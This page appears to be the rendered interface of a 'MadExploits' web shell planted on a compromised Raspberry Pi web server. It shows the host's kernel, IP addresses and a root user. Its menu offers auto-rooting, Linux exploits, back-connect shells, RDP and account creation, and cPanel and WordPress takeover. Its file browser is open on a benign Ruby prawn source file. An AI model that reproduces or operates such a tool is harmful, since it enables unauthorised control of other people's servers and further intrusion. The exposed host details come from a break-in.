Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
prawn /
table /
cell /
[ HOME SHELL ]
Name
Size
Permission
Action
image.rb
1.38
KB
-rw-r--r--
in_table.rb
625
B
-rw-r--r--
span_dummy.rb
2.21
KB
-rw-r--r--
subtable.rb
1.27
KB
-rw-r--r--
text.rb
4.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : image.rb
# encoding: utf-8 # image.rb: Table image cells. # # Copyright September 2010, Brad Ediger. All Rights Reserved. # # This is free software. Please see the LICENSE and COPYING files for details. module Prawn class Table class Cell # @private class Image < Cell def initialize(pdf, point, options={}) @image_options = {} super @pdf_object, @image_info = @pdf.build_image_object(@file) @natural_width, @natural_height = @image_info.calc_image_dimensions( @image_options) end def image=(file) @file = file end def scale=(s) @image_options[:scale] = s end def fit=(f) @image_options[:fit] = f end def image_height=(h) @image_options[:height] = h end def image_width=(w) @image_options[:width] = w end def position=(p) @image_options[:position] = p end def vposition=(vp) @image_options[:vposition] = vp end def natural_content_width @natural_width end def natural_content_height @natural_height end # Draw the image on the page. # def draw_content @pdf.embed_image(@pdf_object, @image_info, @image_options) end end end end end
Close